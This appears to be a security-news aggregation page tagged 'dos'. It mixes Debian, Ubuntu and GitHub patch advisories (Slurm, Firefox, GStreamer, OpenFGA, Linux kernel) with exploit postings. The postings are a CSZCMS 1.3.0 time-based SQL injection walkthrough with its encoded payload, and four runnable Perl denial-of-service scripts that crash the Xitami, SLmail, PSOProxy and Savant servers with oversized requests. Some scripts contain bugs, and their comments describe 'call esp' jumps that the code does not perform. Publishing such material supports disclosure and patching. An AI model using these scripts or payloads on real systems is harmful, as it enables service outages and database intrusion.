Debian Linux Security Advisory 5609-1 - Several vulnerabilities were discovered in the Slurm Workload Manager, a cluster resource management and job scheduling system, which may result in privilege escalation, denial of service, bypass of message hash checks or opening files with an incorrect set of extended groups.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA512- -------------------------------------------------------------------------Debian Security Advisory DSA-5609-1                   security@debian.orghttps://www.debian.org/security/                     Salvatore BonaccorsoJanuary 28, 2024                      https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : slurm-wlmCVE ID         : CVE-2023-49933 CVE-2023-49936 CVE-2023-49937 CVE-2023-49938Debian Bug     : 1058720Several vulnerabilities were discovered in the Slurm Workload Manager, acluster resource management and job scheduling system, which may resultin privilege escalation, denial of service, bypass of message hashchecks or opening files with an incorrect set of extended groups.For the stable distribution (bookworm), these problems have been fixedin version 22.05.8-4+deb12u2.We recommend that you upgrade your slurm-wlm packages.For the detailed security status of slurm-wlm please refer to itssecurity tracker page at:https://security-tracker.debian.org/tracker/slurm-wlmFurther information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQKTBAEBCgB9FiEERkRAmAjBceBVMd3uBUy48xNDz0QFAmW2Sj9fFIAAAAAALgAoaXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldDQ2NDQ0MDk4MDhDMTcxRTA1NTMxRERFRTA1NENCOEYzMTM0M0NGNDQACgkQBUy48xNDz0Q/0xAAiIX2hFquenx281NrzLcnOeIiuvf/+2eXs4/yVQ2P91S7kTzdbRc9n1dVAIwcvQHKHlQH7z/GHVLtjLDwjiAc34OcPzvLipiFgg6JRmKweOMWqyRns9DaIy4vRZRg7RvS4ltDOuqP9UXScTom4GAM3GCF6wrvxsyNwSvwayaJtqQw09OjWHJsKOPeaKJ6yIBfXUukreUQUctVH5P3HG58S1WD/8EqYrpgxC0mBYxs2Iv2FkEcyyiWY2mthuOqkmzfxf25xzQqlDg7kPMikHkqsHmKiFViAWOe44o0C7jED1JOh72BZk93ktrBWaA0lqj9w+CUhPoUinOL76qn+ija8URNIlnPExmY8/BlBDwEZ9pawTo/wv/IS34GzPDrpQQsBTRPpfO9FrJYPf87Ryfp7OpkWfa6LLqTckDp0PQc05/ABdKVtBw/OtfHZud9/qO+M80045IP4QIzDOiYkAQPEbnS3qlT6Io8RYu4C1tNiALBksMnuim3E63dKbRN4lBzCujKY0clKPLtafE6uNXv9gpQRdq2irDGo+IY8A2rfziWqrmdmiP5bxyQsZNpTuNSVGa5s+skId17xZDH/uQBi6UTT/0Qz8mceqa1Ufzu2bbpNHVdgGZ+YbAjAT7bOr5AY1JHqdCDXx6Pl2vQhIss20R3bxi8O0oZODPquGWgkwA==fdxl-----END PGP SIGNATURE-----

Debian Security Advisory 5609-1

Ubuntu Security Notice 6610-1 - Multiple security issues were discovered in Firefox. If a user were tricked into opening a specially crafted website, an attacker could potentially exploit these to cause a denial of service, obtain sensitive information across domains, or execute arbitrary code. Cornel Ionce discovered that Firefox did not properly manage memory when opening the print preview dialog. An attacker could potentially exploit this issue to cause a denial of service.

    ==========================================================================Ubuntu Security Notice USN-6610-1January 29, 2024firefox vulnerabilities==========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 20.04 LTSSummary:Several security issues were fixed in Firefox.Software Description:- firefox: Mozilla Open Source web browserDetails:Multiple security issues were discovered in Firefox. If a user weretricked into opening a specially crafted website, an attacker couldpotentially exploit these to cause a denial of service, obtain sensitiveinformation across domains, or execute arbitrary code. (CVE-2024-0741,CVE-2024-0742, CVE-2024-0743, CVE-2024-0744, CVE-2024-0745, CVE-2024-0747,CVE-2024-0748, CVE-2024-0749, CVE-2024-0750, CVE-2024-0751, CVE-2024-0753,CVE-2024-0754, CVE-2024-0755)Cornel Ionce discovered that Firefox did not properly manage memory whenopening the print preview dialog. An attacker could potentially exploitthis issue to cause a denial of service. (CVE-2024-0746)Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 20.04 LTS:  firefox                         122.0+build2-0ubuntu0.20.04.1After a standard system update you need to restart Firefox to make all thenecessary changes.References:  https://ubuntu.com/security/notices/USN-6610-1  CVE-2024-0741, CVE-2024-0742, CVE-2024-0743, CVE-2024-0744,  CVE-2024-0745, CVE-2024-0746, CVE-2024-0747, CVE-2024-0748,  CVE-2024-0749, CVE-2024-0750, CVE-2024-0751, CVE-2024-0753,  CVE-2024-0754, CVE-2024-0755Package Information:  https://launchpad.net/ubuntu/+source/firefox/122.0+build2-0ubuntu0.20.04.1

Ubuntu Security Notice USN-6610-1

Debian Linux Security Advisory 5608-1 - A heap-based buffer overflow during tile list parsing was discovered in the AV1 video codec parser for the GStreamer media framework, which may result in denial of service or potentially the execution of arbitrary code if a malformed media file is opened.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA512- -------------------------------------------------------------------------Debian Security Advisory DSA-5608-1                   security@debian.orghttps://www.debian.org/security/                     Salvatore BonaccorsoJanuary 27, 2024                      https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : gst-plugins-bad1.0CVE ID         : CVE-2024-0444A heap-based buffer overflow during tile list parsing was discovered inthe AV1 video codec parser for the GStreamer media framework, which mayresult in denial of service or potentially the execution of arbitrarycode if a malformed media file is opened.For the oldstable distribution (bullseye), this problem has been fixedin version 1.18.4-3+deb11u4.For the stable distribution (bookworm), this problem has been fixed inversion 1.22.0-4+deb12u5.We recommend that you upgrade your gst-plugins-bad1.0 packages.For the detailed security status of gst-plugins-bad1.0 please refer toits security tracker page at:https://security-tracker.debian.org/tracker/gst-plugins-bad1.0Further information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQKTBAEBCgB9FiEERkRAmAjBceBVMd3uBUy48xNDz0QFAmW1XvtfFIAAAAAALgAoaXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldDQ2NDQ0MDk4MDhDMTcxRTA1NTMxRERFRTA1NENCOEYzMTM0M0NGNDQACgkQBUy48xNDz0T6lQ//U5/FcuUV+SLF3IYzbSGP3nxOl3njQNMQz12woGd8SJdFpsEgeyOFUqwE1u6xUjNbryI3N/U3zGxEH3P5gZdcxXbQX3dWqHr6IrBC1ciBwKZrtmcmy9ME2OZd1r2QYGNxGYr2d/E9IV6lvT6L2MPeKTbEmAUjCGgY/nsPi9P2ECwufD7KEHh+6IXn5WRPEFIWioOXWhiBn02x612VHJUvux5geBz6oLkl9sc2V9coHx19kywaC9W2JMttSlyBaw3s7l2lv25rwTYCie1YmAgjsvnyZu3ijGMwHp/Sa7RYUkTC09S/fzuZlFOADz5HRslsjvlk0SomPg5A0J6eDYVQUqE3fq3A2zRtkDbeGbScAmc4eyR1d4LE0FqTPOUxZoCR84fP542vOqLimvfdnkkaPSJwcQJRrwKx4r/hYFwOi4W1gwy90at7MQljzwrfExMcXu9B3WmzmwAcTsX9nrgyiXNKH3Lib0gT+93TbqdhUNHuj9zC885JfOwxTh+jRaas4dyx4Tjaz83pJaUzEEIgAHByfr5N1UltvIUmO7AX9C9iLLyVVmgb2Qz0ujdc1N8XSqcvB52psJe5o6oEx6UbAVTH48PGrCuYY2kfzKKHYUan6n8MILRw8Is4FaUz4BAUd6Fjgo+jG/oS32grK7aujTbqRCiDaTDLcT/vywZldQA==giTa-----END PGP SIGNATURE-----

Debian Security Advisory 5608-1

CSZCMS version 1.3.0 suffers from a remote SQL injection vulnerability in the admin flows.

    # Title:  CSZCMS v1.3.0 - SQL Injection# Author: Abdulaziz Almetairy# Date: 27/01/2024# Vendor: https://www.cszcms.com/# Software: https://sourceforge.net/projects/cszcms/files/install/CSZCMS-V1.3.0.zip/download# Reference: https://github.com/oh-az# Tested on: Windows 11, MySQL, Apache# 1 - Log in to the admin portalhttp://localhost/cszcms/admin/login# 2 - Navigate to General Menu > Member Users.# 3 Click the 'View' button next to any username.# 4 Intercept the requestGET /cszcms/admin/members/view/1 HTTP/1.1Host: localhostUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: closeCookie: 86112035d26bb3c291899278f9ab4fb2_cszsess=n5v1jcdqfjuuo32ng66e4rttg65ugdssUpgrade-Insecure-Requests: 1# 5 Modify the paramter /cszcms/admin/members/view/1to /cszcms/admin/members/view/'or(sleep(10))#and url encode all characters/cszcms/admin/members/view/%27%6f%72%28%73%6c%65%65%70%28%31%30%29%29%23%20Impact: Exploiting this SQL injection vulnerability allows an attacker to read sensitive data, enumerate database structures, and potentially cause denial of service through time-based SQL injection by manipulating queries to exploit delays in the application's response.Fix: Implement rigorous input validation and exclusively utilize prepared statements to prevent SQL injection vulnerabilities.

CSZCMS 1.3.0 SQL Injection

Xitami version 2.5b4 remote denial of service exploit.

#!/usr/bin/perl

use IO::Socket::INET;

# Exploit Title: Xitami 2.5b4 - Denial of Service (DoS)  
# Discovery by: Fernando Mengali  
# Discovery Date: 29 january 2024  
# Vendor Homepage: https://imatix-legacy.github.io/xitami.com/  
# Download to demo: https://drive.google.com/file/d/1hOVDRvk0KlZbHM4HeNhvhlbETbmQVEsf/view?usp=sharing  
# Notification vendor: No reported  
# Tested Version: Xitami 2.5b4   
# Tested on: Window XP Professional - Service Pack 2 and 3 - English  
# Vulnerability Type: Denial of Service (DoS)  
# Vídeo: https://www.youtube.com/watch?v=Sxe6HIhAl4A

#1. Description

#His technique works fine against Windows XP Professional Service Pack 2 and 3 (English).  
#For this exploit I have tried several strategies to increase reliability and performance:  
#Jump to a static 'call esp'  
#Backwards jump to code a known distance from the stack pointer.  
#The server did not properly handle request with large amounts of data to webserver.  
#The following request sends a large amount of data to the webserver to process, the server will crash as soon as it is received and processed, causing denial of service conditions.  
#Successful exploitation of these issues allows remote attackers to crash the affected server, denying service to legitimate users.

#2. Proof of Concept - PoC

    $sis="$^O";

    if ($sis eq "windows"){  
      $cmd="cls";  
    } else {  
      $cmd="clear";  
    }

    system("$cmd");

        intro();  
    main();

print "\t    ==> Connecting to webserver... \n\n";  
sleep(1);

    $exploit  = "A"*939;

if ($socket = IO::Socket::INET->new  
   (PeerAddr => $ip,  
   PeerPort => $port,   
   Proto => "TCP"))

       {   
    $header =  
    "GET / HTTP/1.1\r\n".  
    "Host: ".$target." \r\n".  
    "If-Modified-Since: AAAAAAAAAAAAA "." $exploit\r\n";

    print $socket $header."\r\n";  
    sleep(1);  
    close($socket);  
    }

else  
  {  
  print "[-] Connection to $target failed!\n";  
  } 

            print "\t    ==> Done! Exploited!";  
   sub intro {  
      print q {

     _________  
    |         |  
    | Exploit |==( )    //////  
    |_________|   |||   | o o|                   
                    ||| ( c  )                  ____  
                     ||| \= /                  ||   \_  
                      ||||||                   ||     |  
                      ||||||                ...||__/|-"  
                      ||||||             __|________|__  
                        |||             |______________|  
                        |||             || ||      || ||  
                        |||             || ||      || ||  
      ------------|||-------------||-||------||-||-------  
                        |__>            || ||      || ||          

                              [+] Xitami 2.5b4 - Denial of Service (DoS)

      [*] Coded by Fernando Mengali

      [@] e-mail: fernando.mengalli@gmail.com

      }  
  }

  sub main {

our ($ip, $port) = @ARGV;

      unless (defined($ip) && defined($port)) {

        print "\n\tUsage: $0 <ip> <port>                 \n";  
        exit(-1);

      }  
  }

Xitami 2.5b4 Denial Of Service

Seattle Lab Mail version 5.5 remote denial of service exploit.

    use IO::Socket;sub intro {    print "***************************************************\n";    print "*          Seattle Lab Mail (SLmail) 5.5          *\n";    print "*                                                 *\n";        print "*             Coded By Fernando Mengali           *\n";    print "*                                                 *\n";    print "*       POP3 'PASS' Denied of Service - DoS       *\n";    print "*                                                 *\n";    print "***************************************************\n";}intro();    if (!$ARGV[0] && !$ARGV[1]) {        print "\nUsage: $0 <ip> <username>\n";        exit(0);    }my $host = $ARGV[0];my $username = $ARGV[1];my $port = 110;my $payload  = "A" x 2700;    my $s = IO::Socket::INET->new(        PeerAddr => $host,        PeerPort => $port,        Proto    => 'tcp'    ) or die "Unable to connect: $!\n";    $s->recv(my $data, 1024);    # Grab banners (if any)    $s->send('USER ' . $username . "\r\n");    $s->recv(my $response, 1024);    $s->recv(my $data, 1024);    # Grab banners (if any)    $s->send('PASS ' . $payload . "\r\n");    $s->recv(my $response, 1024);        $s->send("QUIT\r\n");    $s->close();

Seattle Lab Mail 5.5 Denial Of Service

PSOProxy version 0.91 remote denial of service exploit.

#!/usr/bin/perl

use IO::Socket::INET;

# Exploit Title: PSOProxy 0.91 - Denial of Service (DoS)  
# Discovery by: Fernando Mengali  
# Discovery Date: 28 january 2024  
# Vendor Homepage: https://sourceforge.net/projects/psoproxy/files/latest/download  
# Download to demo: https://drive.google.com/file/d/1O8Q2d0muet6XuOhqwXuvT3qfzgGNk6vs/view?usp=sharing  
# Notification vendor: No reported  
# Tested Version: PSOProxy 0.91  
# Tested on: Window XP Professional - Service Pack 2 and 3 - English  
# Vulnerability Type: Denial of Service (DoS)  
# Vídeo: https://www.youtube.com/watch?v=ALe3uFS4cUA

#1. Description

#His technique works fine against Windows XP Professional Service Pack 2 and 3 (English).  
#For this exploit I have tried several strategies to increase reliability and performance:  
#Jump to a static 'call esp'  
#Backwards jump to code a known distance from the stack pointer.  
#The server did not properly handle request with large amounts of data to web server.  
#The following request sends a large amount of data to the web server to process, the server will crash as soon as it is received and processed, causing denial of service conditions.  
#Successful exploitation of these issues allows remote attackers to crash the affected server, denying service to legitimate users.

#2. Proof of Concept - PoC

    $sis="$^O";

    if ($sis eq "windows"){  
      $cmd="cls";  
    } else {  
      $cmd="clear";  
    }

    system("$cmd");

        intro();  
    main();

print "\t    ==> Connecting to webserver... \n\n";  
sleep(1);

my $i=0;  
    print "\t    ==> Exploiting... \n\n";

$socket = IO::Socket::INET->new  
     (PeerAddr => $ip,  
      PeerPort => $port,  
      Proto => "tcp")  
{  
        $header =  
        "GET / HTTP/1.1\r\n".  
        "Host: ".$ip." \r\n".  
        "Connection:".$exploit."\r\n";

        print $socket $header."\r\n";  
        sleep(1);  
        close($socket);  
}

 else  
{  
    print "[-] Connection to $target failed!\n";  
    exit;  
}

print "\t    ==> Done! Exploited!";  
   sub intro {  
      print q {

                              ,--,  
                       _ ___/ /\|  
                   ,;'( )__, )  ~  
                  //  //   '--;   
                  '   \     | ^  
                       ^    ^

      [+] PSOProxy 0.91 - Denial of Service (DoS)

      [*] Coded by Fernando Mengali

      [@] e-mail: fernando.mengalli@gmail.com

      }  
  }

  sub main {

our ($ip, $port) = @ARGV;

      unless (defined($ip) && defined($port)) {

        print "\n\tUsage: $0 <ip> <port>                 \n";  
        exit(-1);

      }  
  }

#3. Solution/ How to fix:

# This version product is deprecated

PSOProxy 0.91 Denial Of Service

Savant version 3.0 remote denial of service exploit.

#!/usr/bin/perl

use IO::Socket;

# Exploit Title: Savant 3.0 - Denied of Service (DoS)  
# Discovery by: Fernando Mengali  
# Discovery Date: 27 january 2024  
#https://sourceforge.net/projects/savant/files/Savant/3.0/Savant30.exe/download  
# Download to demo: https://drive.google.com/file/d/18m_wzC8EOSB8lHPc1DexpOfsDm7H8RFs/view?usp=sharing      
# Notification vendor: No reported  
# Tested Version: Savant 3.0 - Denied of Service (DoS)  
# Tested on: Window XP Professional - Service Pack 2 and 3 - English  
# Vulnerability Type: Denied of Service (DoS)

#1. Description

#His technique works fine against Windows XP Professional Service Pack 2 and 3 (English).  
#For this exploit I have tried several strategies to increase reliability and performance:  
#Jump to a static 'call esp'  
#Backwards jump to code a known distance from the stack pointer.  
#The web server does not correctly handle the amount of data or bytes sent to command RNTO.  
#When authenticating to the web server with a large number of characters for the server to process, the server will crash as soon as it is received and processed, causing Denied of service conditions.  
#Successful exploitation of these issues allows remote attackers to crash the affected server, denying service to legitimate users.

#2. Proof of Concept - PoC

    $sis="$^O";

    if ($sis eq "windows"){  
      $cmd="cls";  
    } else {  
      $cmd="clear";  
    }

    system("$cmd");

        intro();  
    main();

        print "[+] Exploiting... \n";

    my $sc = "\x90" x 245;

    my $buf = "\x41\x41" . " /" . $sc."\r\n\r\n";

my $s = IO::Socket::INET->new(PeerAddr => $ip, PeerPort => $por, Proto => 'tcp') or exit;  
$s->send($buf);  
close $s;

    print "[+] Done - Exploited success!!!!!\n\n";

     sub intro {  
      print q {

                            _/|       
                           // o\      
                           || ._)    
                           //__\     
                           )___(   

      [+] Savant 3.0 - Denied of Service (DoS)

      [*] Coded by Fernando Mengali

      [@] e-mail: fernando.mengalli@gmail.com

      }  
  }

  sub main {

our ($ip, $port) = @ARGV;

      unless (defined($ip) && defined($port)) {

        print "       \nUsage: $0 <ip> <port>                 \n";  
        exit(-1);

      }  
  }

Savant 3.0 Denial Of Service

## Overview
OpenFGA is vulnerable to a DoS attack. In some scenarios that depend on the model and tuples used, a call to ListObjects may not  release memory properly. So when a sufficiently high number of those calls are executed, the OpenFGA server can create an "out of memory" error and terminate.

## Fix
Upgrade to v1.4.3. This upgrade is backwards compatible.

**Package**

gomod github.com/openfga/openfga (Go)

**Affected versions**

< 1.4.3

**Patched versions**

1.4.3

**Description**

**Overview**

OpenFGA is vulnerable to a DoS attack. In some scenarios that depend on the model and tuples used, a call to ListObjects may not release memory properly. So when a sufficiently high number of those calls are executed, the OpenFGA server can create an "out of memory" error and terminate.

**Fix**

Upgrade to v1.4.3. This upgrade is backwards compatible.

**References**

*   GHSA-rxpw-85vw-fx87
*   https://nvd.nist.gov/vuln/detail/CVE-2024-23820
*   openfga/openfga@908ac85
*   https://github.com/openfga/openfga/releases/tag/v1.4.3

 miparnisari published to openfga/openfga

Jan 26, 2024

Published by the National Vulnerability Database

Jan 26, 2024

Published to the GitHub Advisory Database

Jan 26, 2024

Reviewed

Jan 26, 2024

GHSA-rxpw-85vw-fx87: OpenFGA denial of service

Ubuntu Security Notice 6609-1 - Lin Ma discovered that the netfilter subsystem in the Linux kernel did not properly validate network family support while creating a new netfilter table. A local attacker could use this to cause a denial of service or possibly execute arbitrary code. It was discovered that the CIFS network file system implementation in the Linux kernel did not properly validate the server frame size in certain situation, leading to an out-of-bounds read vulnerability. An attacker could use this to construct a malicious CIFS image that, when operated on, could cause a denial of service or possibly expose sensitive information.

    ==========================================================================Ubuntu Security Notice USN-6609-1January 26, 2024linux, linux-aws, linux-aws-5.15, linux-gcp, linux-gcp-5.15, linux-gke,linux-gkeop, linux-gkeop-5.15, linux-hwe-5.15, linux-ibm, linux-ibm-5.15,linux-kvm, linux-lowlatency-hwe-5.15, linux-raspi vulnerabilities==========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 22.04 LTS- Ubuntu 20.04 LTSSummary:Several security issues were fixed in the Linux kernel.Software Description:- linux: Linux kernel- linux-aws: Linux kernel for Amazon Web Services (AWS) systems- linux-gcp: Linux kernel for Google Cloud Platform (GCP) systems- linux-gke: Linux kernel for Google Container Engine (GKE) systems- linux-gkeop: Linux kernel for Google Container Engine (GKE) systems- linux-ibm: Linux kernel for IBM cloud systems- linux-kvm: Linux kernel for cloud environments- linux-raspi: Linux kernel for Raspberry Pi systems- linux-aws-5.15: Linux kernel for Amazon Web Services (AWS) systems- linux-gcp-5.15: Linux kernel for Google Cloud Platform (GCP) systems- linux-gkeop-5.15: Linux kernel for Google Container Engine (GKE) systems- linux-hwe-5.15: Linux hardware enablement (HWE) kernel- linux-ibm-5.15: Linux kernel for IBM cloud systems- linux-lowlatency-hwe-5.15: Linux low latency kernelDetails:Lin Ma discovered that the netfilter subsystem in the Linux kernel did notproperly validate network family support while creating a new netfiltertable. A local attacker could use this to cause a denial of service orpossibly execute arbitrary code. (CVE-2023-6040)It was discovered that the CIFS network file system implementation in theLinux kernel did not properly validate the server frame size in certainsituation, leading to an out-of-bounds read vulnerability. An attackercould use this to construct a malicious CIFS image that, when operated on,could cause a denial of service (system crash) or possibly expose sensitiveinformation. (CVE-2023-6606)Xingyuan Mo discovered that the netfilter subsystem in the Linux kernel didnot properly handle inactive elements in its PIPAPO data structure, leadingto a use-after-free vulnerability. A local attacker could use this to causea denial of service (system crash) or possibly execute arbitrary code.(CVE-2023-6817)Budimir Markovic, Lucas De Marchi, and Pengfei Xu discovered that the perfsubsystem in the Linux kernel did not properly validate all event sizeswhen attaching new events, leading to an out-of-bounds write vulnerability.A local attacker could use this to cause a denial of service (system crash)or possibly execute arbitrary code. (CVE-2023-6931)It was discovered that the IGMP protocol implementation in the Linux kernelcontained a race condition, leading to a use-after-free vulnerability. Alocal attacker could use this to cause a denial of service (system crash)or possibly execute arbitrary code. (CVE-2023-6932)Kevin Rich discovered that the netfilter subsystem in the Linux kernel didnot properly check deactivated elements in certain situations, leading to ause-after-free vulnerability. A local attacker could use this to cause adenial of service (system crash) or possibly execute arbitrary code.(CVE-2024-0193)Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 22.04 LTS:   linux-image-5.15.0-1035-gkeop   5.15.0-1035.41   linux-image-5.15.0-1045-ibm     5.15.0-1045.48   linux-image-5.15.0-1045-raspi   5.15.0-1045.48   linux-image-5.15.0-1049-gcp     5.15.0-1049.57   linux-image-5.15.0-1049-gke     5.15.0-1049.54   linux-image-5.15.0-1049-kvm     5.15.0-1049.54   linux-image-5.15.0-1052-aws     5.15.0-1052.57   linux-image-5.15.0-92-generic   5.15.0-92.102   linux-image-5.15.0-92-generic-64k  5.15.0-92.102   linux-image-5.15.0-92-generic-lpae  5.15.0-92.102   linux-image-aws-lts-22.04       5.15.0.1052.51   linux-image-gcp-lts-22.04       5.15.0.1049.45   linux-image-generic             5.15.0.92.89   linux-image-generic-64k         5.15.0.92.89   linux-image-generic-lpae        5.15.0.92.89   linux-image-gke                 5.15.0.1049.48   linux-image-gke-5.15            5.15.0.1049.48   linux-image-gkeop               5.15.0.1035.34   linux-image-gkeop-5.15          5.15.0.1035.34   linux-image-ibm                 5.15.0.1045.41   linux-image-kvm                 5.15.0.1049.45   linux-image-raspi               5.15.0.1045.43   linux-image-raspi-nolpae        5.15.0.1045.43   linux-image-virtual             5.15.0.92.89Ubuntu 20.04 LTS:   linux-image-5.15.0-1035-gkeop   5.15.0-1035.41~20.04.1   linux-image-5.15.0-1045-ibm     5.15.0-1045.48~20.04.1   linux-image-5.15.0-1049-gcp     5.15.0-1049.57~20.04.1   linux-image-5.15.0-1052-aws     5.15.0-1052.57~20.04.1   linux-image-5.15.0-92-generic   5.15.0-92.102~20.04.1   linux-image-5.15.0-92-generic-64k  5.15.0-92.102~20.04.1   linux-image-5.15.0-92-generic-lpae  5.15.0-92.102~20.04.1   linux-image-5.15.0-92-lowlatency  5.15.0-92.102~20.04.1   linux-image-5.15.0-92-lowlatency-64k  5.15.0-92.102~20.04.1   linux-image-aws                 5.15.0.1052.57~20.04.40   linux-image-gcp                 5.15.0.1049.57~20.04.1   linux-image-generic-64k-hwe-20.04  5.15.0.92.102~20.04.49   linux-image-generic-hwe-20.04   5.15.0.92.102~20.04.49   linux-image-generic-lpae-hwe-20.04  5.15.0.92.102~20.04.49   linux-image-gkeop-5.15          5.15.0.1035.41~20.04.31   linux-image-ibm                 5.15.0.1045.48~20.04.17   linux-image-lowlatency-64k-hwe-20.04  5.15.0.92.102~20.04.46   linux-image-lowlatency-hwe-20.04  5.15.0.92.102~20.04.46   linux-image-oem-20.04           5.15.0.92.102~20.04.49   linux-image-oem-20.04b          5.15.0.92.102~20.04.49   linux-image-oem-20.04c          5.15.0.92.102~20.04.49   linux-image-oem-20.04d          5.15.0.92.102~20.04.49   linux-image-virtual-hwe-20.04   5.15.0.92.102~20.04.49After a standard system update you need to reboot your computer to makeall the necessary changes.ATTENTION: Due to an unavoidable ABI change the kernel updates havebeen given a new version number, which requires you to recompile andreinstall all third party kernel modules you might have installed.Unless you manually uninstalled the standard kernel metapackages(e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual,linux-powerpc), a standard system upgrade will automatically performthis as well.References:   https://ubuntu.com/security/notices/USN-6609-1   CVE-2023-6040, CVE-2023-6606, CVE-2023-6817, CVE-2023-6931,   CVE-2023-6932, CVE-2024-0193Package Information:   https://launchpad.net/ubuntu/+source/linux/5.15.0-92.102   https://launchpad.net/ubuntu/+source/linux-aws/5.15.0-1052.57   https://launchpad.net/ubuntu/+source/linux-gcp/5.15.0-1049.57   https://launchpad.net/ubuntu/+source/linux-gke/5.15.0-1049.54   https://launchpad.net/ubuntu/+source/linux-gkeop/5.15.0-1035.41   https://launchpad.net/ubuntu/+source/linux-ibm/5.15.0-1045.48   https://launchpad.net/ubuntu/+source/linux-kvm/5.15.0-1049.54   https://launchpad.net/ubuntu/+source/linux-raspi/5.15.0-1045.48   https://launchpad.net/ubuntu/+source/linux-aws-5.15/5.15.0-1052.57~20.04.1   https://launchpad.net/ubuntu/+source/linux-gcp-5.15/5.15.0-1049.57~20.04.1   https://launchpad.net/ubuntu/+source/linux-gkeop-5.15/5.15.0-1035.41~20.04.1   https://launchpad.net/ubuntu/+source/linux-hwe-5.15/5.15.0-92.102~20.04.1   https://launchpad.net/ubuntu/+source/linux-ibm-5.15/5.15.0-1045.48~20.04.1 https://launchpad.net/ubuntu/+source/linux-lowlatency-hwe-5.15/5.15.0-92.102~20.04.1

Tag

#dos